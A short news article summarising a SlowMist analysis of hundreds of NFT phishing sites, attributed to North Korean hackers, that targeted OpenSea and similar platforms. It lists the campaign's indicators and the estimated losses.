SlowMist exposes hundreds of NFT phishing websites, targeting users of platforms like OpenSea

share
SlowMist exposes hundreds of NFT phishing websites, targeting users of platforms like OpenSea

SlowMist mentioned several characteristics of hacker attacks in their analysis report. Phishing website attacks have been ongoing for several months, with hackers successfully obtaining about 300 ETH. Additionally, it appears that hackers from North Korea and Eastern Europe are collaborating to scam NFT users.

Table of Contents

According to an article by SlowMist in September, as well as 196 NFT phishing websites related to North Korean hackers exposed by Twitter user PhantomXSec, SlowMist recently released an analysis report on this incident.

SlowMist's investigation revealed that the attack has been ongoing for several months, with North Korea's Advanced Persistent Threat (APT) persisting for months, and the earliest registered phishing website was seven months ago.

The phishing attacks targeted users of NFT platforms such as OpenSea, Rarible, X2Y2, etc., first attracting users through legitimate NFTs, then redirecting them to phishing websites for minting, thereby tricking users into authorizing NFTs or ERC-20 tokens in their wallets to the website.

SlowMist identified several characteristics of the phishing websites, including the following codes in the website or authorization requests:

  1. Recording visitor data: mmAddr records the visitor's wallet address, accessTime records the time.

  2. Requesting price data: getPriceData.php.

  3. Linking images to specific projects under the filename "imgSrc.js".

  4. Domain used to monitor user requests and record user data: thedoodles.site.

SlowMist pointed out that even if the phishing website's domain is not "opensea.io," the correct URL can still be displayed during wallet authorization, making it appear legitimate.

SlowMist estimates that hackers have obtained at least 1,055 NFTs, selling them for approximately 300 ETH in profit. Furthermore, during the tracking process, it was discovered that North Korean and Eastern European hackers seem to be collaborating to defraud NFT users.